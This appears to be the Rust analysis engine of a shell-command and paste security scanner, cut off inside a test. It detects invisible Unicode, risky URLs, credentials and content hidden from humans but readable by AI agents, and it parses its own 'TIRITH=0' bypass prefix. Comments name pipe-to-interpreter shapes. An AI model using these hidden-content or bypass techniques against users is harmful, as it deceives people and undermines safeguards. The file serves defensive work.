tirith_core/
engine.rs

1use std::time::Instant;
2
3use crate::extract::{self, ScanContext};
4use crate::normalize;
5use crate::policy::Policy;
6use crate::tokenize::ShellType;
7use crate::verdict::{Finding, Timings, Verdict};
8
9/// Extract the raw path from a URL string before any normalization.
10fn extract_raw_path_from_url(raw: &str) -> Option<String> {
11    if let Some(idx) = raw.find("://") {
12        let after = &raw[idx + 3..];
13        if let Some(slash_idx) = after.find('/') {
14            let path_start = &after[slash_idx..];
15            let end = path_start.find(['?', '#']).unwrap_or(path_start.len());
16            return Some(path_start[..end].to_string());
17        }
18    }
19    None
20}
21
22/// Analysis context passed through the pipeline.
23pub struct AnalysisContext {
24    pub input: String,
25    pub shell: ShellType,
26    pub scan_context: ScanContext,
27    pub raw_bytes: Option<Vec<u8>>,
28    pub interactive: bool,
29    pub cwd: Option<String>,
30    /// File path being scanned (only populated for ScanContext::FileScan).
31    pub file_path: Option<std::path::PathBuf>,
32    /// Only populated for ScanContext::FileScan. When None, configfile checks use
33    /// `file_path`'s parent as implicit repo root.
34    pub repo_root: Option<String>,
35    /// True when `file_path` was explicitly provided by the user as a config file.
36    pub is_config_override: bool,
37    /// Clipboard HTML content for rich-text paste analysis.
38    /// Only populated when `tirith paste --html <path>` is used.
39    pub clipboard_html: Option<String>,
40}
41
42/// Check if a VAR=VALUE word is `TIRITH=0`, stripping optional surrounding quotes
43/// from the value (handles `TIRITH='0'` and `TIRITH="0"`).
44fn is_tirith_zero_assignment(word: &str) -> bool {
45    if let Some((name, raw_val)) = word.split_once('=') {
46        let val = raw_val.trim_matches(|c: char| c == '\'' || c == '"');
47        if name == "TIRITH" && val == "0" {
48            return true;
49        }
50    }
51    false
52}
53
54/// Check if the input contains an inline `TIRITH=0` bypass prefix.
55/// Handles POSIX bare prefix (`TIRITH=0 cmd`), env wrappers (`env -i TIRITH=0 cmd`),
56/// and PowerShell env syntax (`$env:TIRITH="0"; cmd`).
57fn find_inline_bypass(input: &str, shell: ShellType) -> bool {
58    use crate::tokenize;
59
60    if matches!(shell, ShellType::Posix | ShellType::Fish) {
61        let segments = tokenize::tokenize(input, shell);
62        // The documented bypass shape is `TIRITH=0 <cmd> | <interp>`. Multi-segment
63        // pipelines share an env (bypass applies to the whole pipeline), but
64        // sequencing operators (`&&`, `||`, `;`, `&`) start independent commands
65        // where bypass must NOT carry over.
66        if !all_pipe_separated(&segments) || has_unquoted_ampersand(input, shell) {
67            return false;
68        }
69    }
70
71    let words = split_raw_words(input, shell);
72    if words.is_empty() {
73        return false;
74    }
75
76    // POSIX / Fish (Fish 3.1+): leading `VAR=VALUE` assignments, then optionally
77    // an `env` wrapper, then the command. Walk past them looking for TIRITH=0.
78    let mut idx = 0;
79    while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
80        if is_tirith_zero_assignment(&words[idx]) {
81            return true;
82        }
83        idx += 1;
84    }
85
86    // If the first real word is `env`, parse its flags and assignments.
87    if idx < words.len() {
88        let cmd = words[idx].rsplit('/').next().unwrap_or(&words[idx]);
89        let cmd = cmd.trim_matches(|c: char| c == '\'' || c == '"');
90        if cmd == "env" {
91            idx += 1;
92            while idx < words.len() {
93                let w = &words[idx];
94                if w == "--" {
95                    idx += 1;
96                    break;
97                }
98                if tokenize::is_env_assignment(w) {
99                    if is_tirith_zero_assignment(w) {
100                        return true;
101                    }
102                    idx += 1;
103                    continue;
104                }
105                if w.starts_with('-') {
106                    if w.starts_with("--") {
107                        if env_long_flag_takes_value(w) && !w.contains('=') {
108                            idx += 2;
109                        } else {
110                            idx += 1;
111                        }
112                        continue;
113                    }
114                    // Short flags that take a separate value arg.
115                    if w == "-u" || w == "-C" || w == "-S" {
116                        idx += 2;
117                        continue;
118                    }
119                    idx += 1;
120                    continue;
121                }
122                // Non-flag, non-assignment: this is the command word.
123                break;
124            }
125            while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
126                if is_tirith_zero_assignment(&words[idx]) {
127                    return true;
128                }
129                idx += 1;
130            }
131        }
132    }
133
134    // PowerShell: `$env:TIRITH="0"` (single word) or `$env:TIRITH = "0"` (spaced).
135    if shell == ShellType::PowerShell {
136        for word in &words {
137            if is_powershell_tirith_bypass(word) {
138                return true;
139            }
140        }
141        if words.len() >= 3 {
142            for window in words.windows(3) {
143                if is_powershell_env_ref(&window[0], "TIRITH")
144                    && window[1] == "="
145                    && strip_surrounding_quotes(&window[2]) == "0"
146                {
147                    return true;
148                }
149            }
150        }
151    }
152
153    // cmd.exe: `set TIRITH="0"` stores the literal `"0"` (with quotes), so only
154    // bare `TIRITH=0` and whole-token-quoted `"TIRITH=0"` are real bypasses.
155    // Inner double quotes and any single quotes must NOT be stripped.
156    if shell == ShellType::Cmd && words.len() >= 2 {
157        let first = words[0].to_lowercase();
158        if first == "set" {
159            let second = strip_double_quotes_only(&words[1]);
160            if let Some((name, val)) = second.split_once('=') {
161                if name == "TIRITH" && val == "0" {
162                    return true;
163                }
164            }
165        }
166    }
167
168    false
169}
170
171fn env_long_flag_takes_value(flag: &str) -> bool {
172    let name = flag.split_once('=').map(|(name, _)| name).unwrap_or(flag);
173    matches!(name, "--unset" | "--chdir" | "--split-string")
174}
175
176/// Check if a word is `$env:TIRITH=0` with optional quotes around the value.
177/// The `$env:` prefix is matched case-insensitively (PowerShell convention).
178fn is_powershell_tirith_bypass(word: &str) -> bool {
179    if !word.starts_with('$') || word.len() < "$env:TIRITH=0".len() {
180        return false;
181    }
182    let after_dollar = &word[1..];
183    if !after_dollar
184        .get(..4)
185        .is_some_and(|s| s.eq_ignore_ascii_case("env:"))
186    {
187        return false;
188    }
189    let after_env = &after_dollar[4..];
190    if !after_env
191        .get(..7)
192        .is_some_and(|s| s.eq_ignore_ascii_case("TIRITH="))
193    {
194        return false;
195    }
196    let value = &after_env[7..];
197    strip_surrounding_quotes(value) == "0"
198}
199
200/// Check if a word is a PowerShell env var reference `$env:VARNAME` (no assignment).
201fn is_powershell_env_ref(word: &str, var_name: &str) -> bool {
202    if !word.starts_with('$') {
203        return false;
204    }
205    let after_dollar = &word[1..];
206    if !after_dollar
207        .get(..4)
208        .is_some_and(|s| s.eq_ignore_ascii_case("env:"))
209    {
210        return false;
211    }
212    after_dollar[4..].eq_ignore_ascii_case(var_name)
213}
214
215/// Strip a single layer of matching quotes (single or double) from a string.
216fn strip_surrounding_quotes(s: &str) -> &str {
217    if s.len() >= 2
218        && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
219    {
220        &s[1..s.len() - 1]
221    } else {
222        s
223    }
224}
225
226/// Strip a single layer of matching double quotes only. For Cmd, single quotes are literal.
227fn strip_double_quotes_only(s: &str) -> &str {
228    if s.len() >= 2 && s.starts_with('"') && s.ends_with('"') {
229        &s[1..s.len() - 1]
230    } else {
231        s
232    }
233}
234
235/// Split input into raw words respecting quotes (for bypass/self-invocation parsing).
236/// Unlike tokenize(), this doesn't split on pipes/semicolons — just whitespace-splits
237/// the raw input to inspect the first segment's words.
238///
239/// Shell-aware: POSIX uses backslash as escape inside double-quotes and bare context;
240/// PowerShell uses backtick (`` ` ``) instead.
241fn split_raw_words(input: &str, shell: ShellType) -> Vec<String> {
242    let escape_char = match shell {
243        ShellType::PowerShell => '`',
244        ShellType::Cmd => '^',
245        _ => '\\',
246    };
247
248    // Stop at the first unquoted segment boundary — we only care about the
249    // first command's words for bypass detection.
250    let mut words = Vec::new();
251    let mut current = String::new();
252    let chars: Vec<char> = input.chars().collect();
253    let len = chars.len();
254    let mut i = 0;
255
256    while i < len {
257        let ch = chars[i];
258        match ch {
259            ' ' | '\t' if !current.is_empty() => {
260                words.push(current.clone());
261                current.clear();
262                i += 1;
263                while i < len && (chars[i] == ' ' || chars[i] == '\t') {
264                    i += 1;
265                }
266            }
267            ' ' | '\t' => {
268                i += 1;
269            }
270            '|' | '\n' | '&' => break,
271            ';' if shell != ShellType::Cmd => break,
272            '#' if shell == ShellType::PowerShell => break,
273            '\'' if shell != ShellType::Cmd => {
274                current.push(ch);
275                i += 1;
276                while i < len && chars[i] != '\'' {
277                    current.push(chars[i]);
278                    i += 1;
279                }
280                if i < len {
281                    current.push(chars[i]);
282                    i += 1;
283                }
284            }
285            '"' => {
286                current.push(ch);
287                i += 1;
288                while i < len && chars[i] != '"' {
289                    if chars[i] == escape_char && i + 1 < len {
290                        current.push(chars[i]);
291                        current.push(chars[i + 1]);
292                        i += 2;
293                    } else {
294                        current.push(chars[i]);
295                        i += 1;
296                    }
297                }
298                if i < len {
299                    current.push(chars[i]);
300                    i += 1;
301                }
302            }
303            c if c == escape_char && i + 1 < len => {
304                current.push(chars[i]);
305                current.push(chars[i + 1]);
306                i += 2;
307            }
308            _ => {
309                current.push(ch);
310                i += 1;
311            }
312        }
313    }
314    if !current.is_empty() {
315        words.push(current);
316    }
317    words
318}
319
320/// Whether all non-leading segments are joined only by pipe operators (`|`, `|&`).
321///
322/// Returns `true` for a single segment. Used to distinguish the documented
323/// `TIRITH=0 cmd | interp` bypass shape from sequencing chains like
324/// `TIRITH=0 cmd && evil` where the bypass must not apply to the second command.
325fn all_pipe_separated(segments: &[crate::tokenize::Segment]) -> bool {
326    segments
327        .iter()
328        .skip(1)
329        .all(|s| matches!(s.preceding_separator.as_deref(), Some("|") | Some("|&")))
330}
331
332/// Check if input contains an unquoted `&` (backgrounding operator).
333fn has_unquoted_ampersand(input: &str, shell: ShellType) -> bool {
334    let escape_char = match shell {
335        ShellType::PowerShell => '`',
336        ShellType::Cmd => '^',
337        _ => '\\',
338    };
339    let chars: Vec<char> = input.chars().collect();
340    let len = chars.len();
341    let mut i = 0;
342    while i < len {
343        match chars[i] {
344            '\'' if shell != ShellType::Cmd => {
345                i += 1;
346                while i < len && chars[i] != '\'' {
347                    i += 1;
348                }
349                if i < len {
350                    i += 1;
351                }
352            }
353            '"' => {
354                i += 1;
355                while i < len && chars[i] != '"' {
356                    if chars[i] == escape_char && i + 1 < len {
357                        i += 2;
358                    } else {
359                        i += 1;
360                    }
361                }
362                if i < len {
363                    i += 1;
364                }
365            }
366            c if c == escape_char && i + 1 < len => {
367                i += 2;
368            }
369            '&' => return true,
370            _ => i += 1,
371        }
372    }
373    false
374}
375
376/// Run the tiered analysis pipeline.
377pub fn analyze(ctx: &AnalysisContext) -> Verdict {
378    analyze_inner(ctx).0
379}
380
381/// Run the tiered analysis pipeline, returning the loaded policy alongside the verdict.
382///
383/// Use this from enforcement callers (check, gateway, MCP) that need the policy
384/// for post-processing — avoids a redundant `Policy::discover()` call.
385pub fn analyze_returning_policy(ctx: &AnalysisContext) -> (Verdict, Policy) {
386    analyze_inner(ctx)
387}
388
389/// Shared implementation for `analyze()` and `analyze_returning_policy()`.
390fn analyze_inner(ctx: &AnalysisContext) -> (Verdict, Policy) {
391    let start = Instant::now();
392
393    let tier0_start = Instant::now();
394    let bypass_env = std::env::var("TIRITH").ok().as_deref() == Some("0");
395    // Inline bypass (`TIRITH=0 cmd | sh`) is honored ONLY in Exec context.
396    // Paste content is attacker-controllable (clipboard can be crafted) and
397    // FileScan has no notion of a typed prefix, so a `TIRITH=0` token in those
398    // contexts must not grant bypass. Process-level TIRITH=0 env still applies
399    // in every context.
400    let bypass_inline =
401        ctx.scan_context == ScanContext::Exec && find_inline_bypass(&ctx.input, ctx.shell);
402    let bypass_requested = bypass_env || bypass_inline;
403    let tier0_ms = tier0_start.elapsed().as_secs_f64() * 1000.0;
404
405    let tier1_start = Instant::now();
406
407    // Paste-only: byte-level scan catches control chars that never make it
408    // into the URL/regex view.
409    let byte_scan_triggered = if ctx.scan_context == ScanContext::Paste {
410        if let Some(ref bytes) = ctx.raw_bytes {
411            let scan = extract::scan_bytes(bytes);
412            scan.has_ansi_escapes
413                || scan.has_control_chars
414                || scan.has_bidi_controls
415                || scan.has_zero_width
416                || scan.has_invalid_utf8
417                || scan.has_unicode_tags
418                || scan.has_variation_selectors
419                || scan.has_invisible_math_operators
420                || scan.has_invisible_whitespace
421                || scan.has_hangul_fillers
422                || scan.has_confusable_text
423        } else {
424            false
425        }
426    } else {
427        false
428    };
429
430    let regex_triggered = extract::tier1_scan(&ctx.input, ctx.scan_context);
431
432    // Exec-only: catch bidi/zero-width/invisible bytes even when no URL fired.
433    // `tirith diff/score/why/receipt/explain` URLs typed by the user are
434    // carved out because they're inspection targets — only the eight Unicode-
435    // style rule classes filtered at tier 3 are affected by this carveout.
436    let inert_range = if ctx.scan_context == ScanContext::Exec {
437        extract::tirith_inert_arg_range(&ctx.input, ctx.shell)
438    } else {
439        None
440    };
441    let exec_bidi_triggered = if ctx.scan_context == ScanContext::Exec {
442        let scan = extract::scan_bytes(ctx.input.as_bytes());
443        let scan = match inert_range.as_ref() {
444            Some(r) => scan.with_ignored_range(r),
445            None => scan,
446        };
447        scan.has_bidi_controls
448            || scan.has_zero_width
449            || scan.has_unicode_tags
450            || scan.has_variation_selectors
451            || scan.has_invisible_math_operators
452            || scan.has_invisible_whitespace
453            || scan.has_hangul_fillers
454            || scan.has_confusable_text
455    } else {
456        false
457    };
458
459    let tier1_ms = tier1_start.elapsed().as_secs_f64() * 1000.0;
460
461    if !byte_scan_triggered && !regex_triggered && !exec_bidi_triggered {
462        let total_ms = start.elapsed().as_secs_f64() * 1000.0;
463        return (
464            Verdict::allow_fast(
465                1,
466                Timings {
467                    tier0_ms,
468                    tier1_ms,
469                    tier2_ms: None,
470                    tier3_ms: None,
471                    total_ms,
472                },
473            ),
474            // discover_partial is local-only and cheap; callers still need DLP
475            // patterns for audit redaction even on fast-exit.
476            Policy::discover_partial(ctx.cwd.as_deref()),
477        );
478    }
479
480    let tier2_start = Instant::now();
481
482    if bypass_requested {
483        let policy = Policy::discover_partial(ctx.cwd.as_deref());
484        let allow_bypass = if ctx.interactive {
485            policy.allow_bypass_env
486        } else {
487            policy.allow_bypass_env_noninteractive
488        };
489
490        if allow_bypass {
491            let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
492            let total_ms = start.elapsed().as_secs_f64() * 1000.0;
493            let mut verdict = Verdict::allow_fast(
494                2,
495                Timings {
496                    tier0_ms,
497                    tier1_ms,
498                    tier2_ms: Some(tier2_ms),
499                    tier3_ms: None,
500                    total_ms,
501                },
502            );
503            verdict.bypass_requested = true;
504            verdict.bypass_honored = true;
505            verdict.interactive_detected = ctx.interactive;
506            verdict.policy_path_used = policy.path.clone();
507            crate::audit::log_verdict(
508                &verdict,
509                &ctx.input,
510                None,
511                None,
512                &policy.dlp_custom_patterns,
513            );
514            return (verdict, policy);
515        }
516    }
517
518    let mut policy = Policy::discover(ctx.cwd.as_deref());
519    policy.load_user_lists();
520    policy.load_org_lists(ctx.cwd.as_deref());
521    policy.load_trust_entries(ctx.cwd.as_deref());
522
523    // Fail-open: None when the DB is unavailable.
524    let threat_db: Option<std::sync::Arc<crate::threatdb::ThreatDb>> =
525        crate::threatdb::ThreatDb::cached();
526
527    let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
528
529    let tier3_start = Instant::now();
530    let mut findings = Vec::new();
531
532    let mut extracted = Vec::new();
533
534    if ctx.scan_context == ScanContext::FileScan {
535        // FileScan runs byte-scan + configfile/codefile/rendered rules only.
536        // It does NOT run command/env/URL-extraction rules — the input isn't a
537        // command line, so those rules would produce nonsense findings.
538        let byte_input = if let Some(ref bytes) = ctx.raw_bytes {
539            bytes.as_slice()
540        } else {
541            ctx.input.as_bytes()
542        };
543        let byte_findings = crate::rules::terminal::check_bytes(byte_input);
544        findings.extend(byte_findings);
545
546        findings.extend(crate::rules::configfile::check(
547            &ctx.input,
548            ctx.file_path.as_deref(),
549            ctx.repo_root.as_deref().map(std::path::Path::new),
550            ctx.is_config_override,
551        ));
552
553        if crate::rules::codefile::is_code_file(
554            ctx.file_path.as_deref().and_then(|p| p.to_str()),
555            &ctx.input,
556        ) {
557            findings.extend(crate::rules::codefile::check(
558                &ctx.input,
559                ctx.file_path.as_deref().and_then(|p| p.to_str()),
560            ));
561        }
562
563        if crate::rules::rendered::is_renderable_file(ctx.file_path.as_deref()) {
564            // PDFs need their own parser; everything else is treated as text.
565            let is_pdf = ctx
566                .file_path
567                .as_deref()
568                .and_then(|p| p.extension())
569                .and_then(|e| e.to_str())
570                .map(|e| e.eq_ignore_ascii_case("pdf"))
571                .unwrap_or(false);
572
573            if is_pdf {
574                let pdf_bytes = ctx.raw_bytes.as_deref().unwrap_or(ctx.input.as_bytes());
575                findings.extend(crate::rules::rendered::check_pdf(pdf_bytes));
576            } else {
577                findings.extend(crate::rules::rendered::check(
578                    &ctx.input,
579                    ctx.file_path.as_deref(),
580                ));
581            }
582        }
583    } else {
584        if ctx.scan_context == ScanContext::Paste {
585            if let Some(ref bytes) = ctx.raw_bytes {
586                let byte_findings = crate::rules::terminal::check_bytes(bytes);
587                findings.extend(byte_findings);
588            }
589            let multiline_findings = crate::rules::terminal::check_hidden_multiline(&ctx.input);
590            findings.extend(multiline_findings);
591
592            if let Some(ref html) = ctx.clipboard_html {
593                let clipboard_findings =
594                    crate::rules::terminal::check_clipboard_html(html, &ctx.input);
595                findings.extend(clipboard_findings);
596            }
597        }
598
599        if ctx.scan_context == ScanContext::Exec {
600            let byte_input = ctx.input.as_bytes();
601            let scan = extract::scan_bytes(byte_input);
602            // Same inert-range carveout as tier-1 so tier-3 findings agree
603            // with `exec_bidi_triggered`.
604            let scan = match inert_range.as_ref() {
605                Some(r) => scan.with_ignored_range(r),
606                None => scan,
607            };
608            if scan.has_bidi_controls
609                || scan.has_zero_width
610                || scan.has_unicode_tags
611                || scan.has_variation_selectors
612                || scan.has_invisible_math_operators
613                || scan.has_invisible_whitespace
614                || scan.has_hangul_fillers
615                || scan.has_confusable_text
616            {
617                // Push the inert range down into check_bytes itself: rules
618                // emitting `Evidence::Text` (e.g. UnicodeTags) have no byte
619                // offset to post-filter against, so they must be suppressed
620                // at scan time.
621                let ignore_ranges: &[std::ops::Range<usize>] = inert_range.as_slice();
622                let byte_findings =
623                    crate::rules::terminal::check_bytes_with_ignore(byte_input, ignore_ranges);
624                // Exec context keeps invisible-char findings only — ANSI/control
625                // escape rules don't apply to typed commands.
626                findings.extend(byte_findings.into_iter().filter(|f| {
627                    matches!(
628                        f.rule_id,
629                        crate::verdict::RuleId::BidiControls
630                            | crate::verdict::RuleId::ZeroWidthChars
631                            | crate::verdict::RuleId::UnicodeTags
632                            | crate::verdict::RuleId::InvisibleMathOperator
633                            | crate::verdict::RuleId::VariationSelector
634                            | crate::verdict::RuleId::InvisibleWhitespace
635                            | crate::verdict::RuleId::HangulFiller
636                            | crate::verdict::RuleId::ConfusableText
637                    )
638                }));
639            }
640        }
641
642        extracted = extract::extract_urls(&ctx.input, ctx.shell);
643
644        for url_info in &extracted {
645            // url::Url percent-encodes non-ASCII on parse, so non-ASCII path
646            // rules need the raw (pre-parse) path instead.
647            let raw_path = extract_raw_path_from_url(&url_info.raw);
648            let normalized_path = url_info.parsed.path().map(normalize::normalize_path);
649
650            let hostname_findings = crate::rules::hostname::check(&url_info.parsed, &policy);
651            findings.extend(hostname_findings);
652
653            let path_findings = crate::rules::path::check(
654                &url_info.parsed,
655                normalized_path.as_ref(),
656                raw_path.as_deref(),
657            );
658            findings.extend(path_findings);
659
660            let transport_findings =
661                crate::rules::transport::check(&url_info.parsed, url_info.in_sink_context);
662            findings.extend(transport_findings);
663
664            let ecosystem_findings = crate::rules::ecosystem::check(&url_info.parsed);
665            findings.extend(ecosystem_findings);
666        }
667
668        // Threat intel rules are a local DB lookup — no network I/O on the hot path.
669        let threat_findings = crate::rules::threatintel::check(
670            &ctx.input,
671            ctx.shell,
672            &extracted,
673            threat_db.as_deref(),
674        );
675        findings.extend(threat_findings);
676
677        let command_findings = crate::rules::command::check(
678            &ctx.input,
679            ctx.shell,
680            ctx.cwd.as_deref(),
681            ctx.scan_context,
682        );
683        findings.extend(command_findings);
684
685        let cred_findings =
686            crate::rules::credential::check(&ctx.input, ctx.shell, ctx.scan_context);
687        findings.extend(cred_findings);
688
689        let env_findings = crate::rules::environment::check(&crate::rules::environment::RealEnv);
690        findings.extend(env_findings);
691
692        if !policy.network_deny.is_empty() {
693            let net_findings = crate::rules::command::check_network_policy(
694                &ctx.input,
695                ctx.shell,
696                &policy.network_deny,
697                &policy.network_allow,
698            );
699            findings.extend(net_findings);
700        }
701    }
702
703    if !policy.custom_rules.is_empty() {
704        let compiled = crate::rules::custom::compile_rules(&policy.custom_rules);
705        let custom_findings = crate::rules::custom::check(&ctx.input, ctx.scan_context, &compiled);
706        findings.extend(custom_findings);
707    }
708
709    for finding in &mut findings {
710        if let Some(override_sev) = policy.severity_override(&finding.rule_id) {
711            finding.severity = override_sev;
712        }
713    }
714
715    // A blocklist hit on any extracted URL yields a fresh Critical finding so
716    // the final verdict escalates to Block regardless of other rules.
717    for url_info in &extracted {
718        if policy.is_blocklisted(&url_info.raw) {
719            findings.push(Finding {
720                rule_id: crate::verdict::RuleId::PolicyBlocklisted,
721                severity: crate::verdict::Severity::Critical,
722                title: "URL matches blocklist".to_string(),
723                description: format!("URL '{}' matches a blocklist pattern", url_info.raw),
724                evidence: vec![crate::verdict::Evidence::Url {
725                    raw: url_info.raw.clone(),
726                }],
727                human_view: None,
728                agent_view: None,
729                mitre_id: None,
730                custom_rule_id: None,
731            });
732        }
733    }
734
735    // Allowlist drops findings whose URLs are allowlisted, but blocklist wins
736    // when both match: blocklisted URLs keep their findings.
737    if !policy.allowlist.is_empty() || !policy.allowlist_rules.is_empty() {
738        let blocklisted_urls: Vec<&str> = extracted
739            .iter()
740            .filter(|u| policy.is_blocklisted(&u.raw))
741            .map(|u| u.raw.as_str())
742            .collect();
743
744        findings.retain(|f| {
745            let urls_in_evidence: Vec<&str> = f
746                .evidence
747                .iter()
748                .filter_map(|e| match e {
749                    crate::verdict::Evidence::Url { raw } => Some(raw.as_str()),
750                    _ => None,
751                })
752                .collect();
753
754            if urls_in_evidence.is_empty() {
755                return true;
756            }
757
758            let rule_allowlisted = |url: &str| {
759                policy.is_allowlisted_for_rule(&f.rule_id.to_string(), url)
760                    || f.custom_rule_id.as_deref().is_some_and(|custom_rule_id| {
761                        policy.is_allowlisted_for_rule(custom_rule_id, url)
762                    })
763            };
764
765            // Keep when any referenced URL is blocklisted; otherwise drop only
766            // if every referenced URL is allowlisted for this finding.
767            urls_in_evidence
768                .iter()
769                .any(|url| blocklisted_urls.contains(url))
770                || !urls_in_evidence
771                    .iter()
772                    .all(|url| policy.is_allowlisted(url) || rule_allowlisted(url))
773        });
774    }
775
776    enrich_pro(&mut findings);
777    enrich_team(&mut findings);
778
779    crate::rule_metadata::filter_early_access(&mut findings, crate::license::Tier::Enterprise);
780
781    let tier3_ms = tier3_start.elapsed().as_secs_f64() * 1000.0;
782    let total_ms = start.elapsed().as_secs_f64() * 1000.0;
783
784    let mut verdict = Verdict::from_findings(
785        findings,
786        3,
787        Timings {
788            tier0_ms,
789            tier1_ms,
790            tier2_ms: Some(tier2_ms),
791            tier3_ms: Some(tier3_ms),
792            total_ms,
793        },
794    );
795    verdict.bypass_requested = bypass_requested;
796    verdict.bypass_available = if ctx.interactive {
797        policy.allow_bypass_env
798    } else {
799        policy.allow_bypass_env_noninteractive
800    };
801    verdict.interactive_detected = ctx.interactive;
802    verdict.policy_path_used = policy.path.clone();
803    verdict.urls_extracted_count = Some(extracted.len());
804
805    (verdict, policy)
806}
807
808/// Filter a verdict's findings by paranoia level.
809///
810/// Output-layer only — the engine always detects everything. CLI/MCP call
811/// this after `analyze()` to reduce noise at lower paranoia levels.
812///
813/// - Paranoia 1-2: Medium+ findings only
814/// - Paranoia 3: also show Low findings
815/// - Paranoia 4: also show Info findings
816pub fn filter_findings_by_paranoia(verdict: &mut Verdict, paranoia: u8) {
817    retain_by_paranoia(&mut verdict.findings, paranoia);
818    verdict.action = recalculate_action(&verdict.findings);
819}
820
821/// Filter a Vec<Finding> by paranoia level.
822/// Same logic as `filter_findings_by_paranoia` but operates on raw findings.
823pub fn filter_findings_by_paranoia_vec(findings: &mut Vec<Finding>, paranoia: u8) {
824    retain_by_paranoia(findings, paranoia);
825}
826
827/// Recalculate verdict action from the current findings (same logic as `Verdict::from_findings`).
828fn recalculate_action(findings: &[Finding]) -> crate::verdict::Action {
829    use crate::verdict::{Action, Severity};
830    if findings.is_empty() {
831        return Action::Allow;
832    }
833    let max_severity = findings
834        .iter()
835        .map(|f| f.severity)
836        .max()
837        .unwrap_or(Severity::Low);
838    match max_severity {
839        Severity::Critical | Severity::High => Action::Block,
840        Severity::Medium | Severity::Low => Action::Warn,
841        Severity::Info => Action::Allow,
842    }
843}
844
845/// Shared paranoia retention logic.
846fn retain_by_paranoia(findings: &mut Vec<Finding>, paranoia: u8) {
847    let effective = paranoia.min(4);
848
849    findings.retain(|f| match f.severity {
850        crate::verdict::Severity::Info => effective >= 4,
851        crate::verdict::Severity::Low => effective >= 3,
852        _ => true,
853    });
854}
855
856/// Pro enrichment: dual-view, decoded content, cloaking diffs, line numbers.
857fn enrich_pro(findings: &mut [Finding]) {
858    for finding in findings.iter_mut() {
859        match finding.rule_id {
860            // Rendered-content findings carry a dual view: what the human sees
861            // vs. what the AI agent processes.
862            crate::verdict::RuleId::HiddenCssContent => {
863                finding.human_view =
864                    Some("Content hidden via CSS — invisible in rendered view".into());
865                finding.agent_view = Some(format!(
866                    "AI agent sees full text including CSS-hidden content. {}",
867                    evidence_summary(&finding.evidence)
868                ));
869            }
870            crate::verdict::RuleId::HiddenColorContent => {
871                finding.human_view =
872                    Some("Text blends with background — invisible to human eye".into());
873                finding.agent_view = Some(format!(
874                    "AI agent reads text regardless of color contrast. {}",
875                    evidence_summary(&finding.evidence)
876                ));
877            }
878            crate::verdict::RuleId::HiddenHtmlAttribute => {
879                finding.human_view =
880                    Some("Elements marked hidden/aria-hidden — not displayed".into());
881                finding.agent_view = Some(format!(
882                    "AI agent processes hidden element content. {}",
883                    evidence_summary(&finding.evidence)
884                ));
885            }
886            crate::verdict::RuleId::HtmlComment => {
887                finding.human_view = Some("HTML comments not rendered in browser".into());
888                finding.agent_view = Some(format!(
889                    "AI agent reads comment content as context. {}",
890                    evidence_summary(&finding.evidence)
891                ));
892            }
893            crate::verdict::RuleId::MarkdownComment => {
894                finding.human_view = Some("Markdown comments not rendered in preview".into());
895                finding.agent_view = Some(format!(
896                    "AI agent processes markdown comment content. {}",
897                    evidence_summary(&finding.evidence)
898                ));
899            }
900            crate::verdict::RuleId::PdfHiddenText => {
901                finding.human_view = Some("Sub-pixel text invisible in PDF viewer".into());
902                finding.agent_view = Some(format!(
903                    "AI agent extracts all text including sub-pixel content. {}",
904                    evidence_summary(&finding.evidence)
905                ));
906            }
907            crate::verdict::RuleId::ClipboardHidden => {
908                finding.human_view =
909                    Some("Hidden content in clipboard HTML not visible in paste preview".into());
910                finding.agent_view = Some(format!(
911                    "AI agent processes full clipboard including hidden HTML. {}",
912                    evidence_summary(&finding.evidence)
913                ));
914            }
915            _ => {}
916        }
917    }
918}
919
920/// Summarize evidence entries for enrichment text.
921fn evidence_summary(evidence: &[crate::verdict::Evidence]) -> String {
922    let details: Vec<&str> = evidence
923        .iter()
924        .filter_map(|e| {
925            if let crate::verdict::Evidence::Text { detail } = e {
926                Some(detail.as_str())
927            } else {
928                None
929            }
930        })
931        .take(3)
932        .collect();
933    if details.is_empty() {
934        String::new()
935    } else {
936        format!("Details: {}", details.join("; "))
937    }
938}
939
940/// Team enrichment: MITRE ATT&CK classification.
941/// Uses the generated `mitre_id_for_rule` from `rule_explanations.toml` (single source of truth).
942fn enrich_team(findings: &mut [Finding]) {
943    for finding in findings.iter_mut() {
944        if finding.mitre_id.is_none() {
945            finding.mitre_id =
946                crate::rule_explanations::mitre_id_for_rule(finding.rule_id).map(String::from);
947        }
948    }
949}
950
951#[cfg(test)]
952mod tests {
953    use super::*;
954    #[test]
955    fn test_exec_bidi_without_url() {
956        // Bidi control alone (no URL) must reach tier 3; else the exec path
957        // would fast-exit and miss the attack.
958        let input = format!("echo hello{}world", '\u{202E}');
959        let ctx = AnalysisContext {
960            input,
961            shell: ShellType::Posix,
962            scan_context: ScanContext::Exec,
963            raw_bytes: None,
964            interactive: true,
965            cwd: None,
966            file_path: None,
967            repo_root: None,
968            is_config_override: false,
969            clipboard_html: None,
970        };
971        let verdict = analyze(&ctx);
972        assert!(
973            verdict.tier_reached >= 3,
974            "bidi in exec should reach tier 3, got tier {}",
975            verdict.tier_reached
976        );
977        assert!(
978            verdict
979                .findings
980                .iter()
981                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::BidiControls)),
982            "should detect bidi controls in exec context"
983        );
984    }
985
986    #[test]
987    fn test_paranoia_filter_suppresses_info_low() {
988        use crate::verdict::{Finding, RuleId, Severity, Timings, Verdict};
989
990        let findings = vec![
991            Finding {
992                // Synthetic Info finding; any rule_id works — we just need one
993                // with Severity::Info for the filter to drop.
994                rule_id: RuleId::NonStandardPort,
995                severity: Severity::Info,
996                title: "info finding".into(),
997                description: String::new(),
998                evidence: vec![],
999                human_view: None,
1000                agent_view: None,
1001                mitre_id: None,
1002                custom_rule_id: None,
1003            },
1004            Finding {
1005                rule_id: RuleId::InvisibleWhitespace,
1006                severity: Severity::Low,
1007                title: "low finding".into(),
1008                description: String::new(),
1009                evidence: vec![],
1010                human_view: None,
1011                agent_view: None,
1012                mitre_id: None,
1013                custom_rule_id: None,
1014            },
1015            Finding {
1016                rule_id: RuleId::HiddenCssContent,
1017                severity: Severity::High,
1018                title: "high finding".into(),
1019                description: String::new(),
1020                evidence: vec![],
1021                human_view: None,
1022                agent_view: None,
1023                mitre_id: None,
1024                custom_rule_id: None,
1025            },
1026        ];
1027
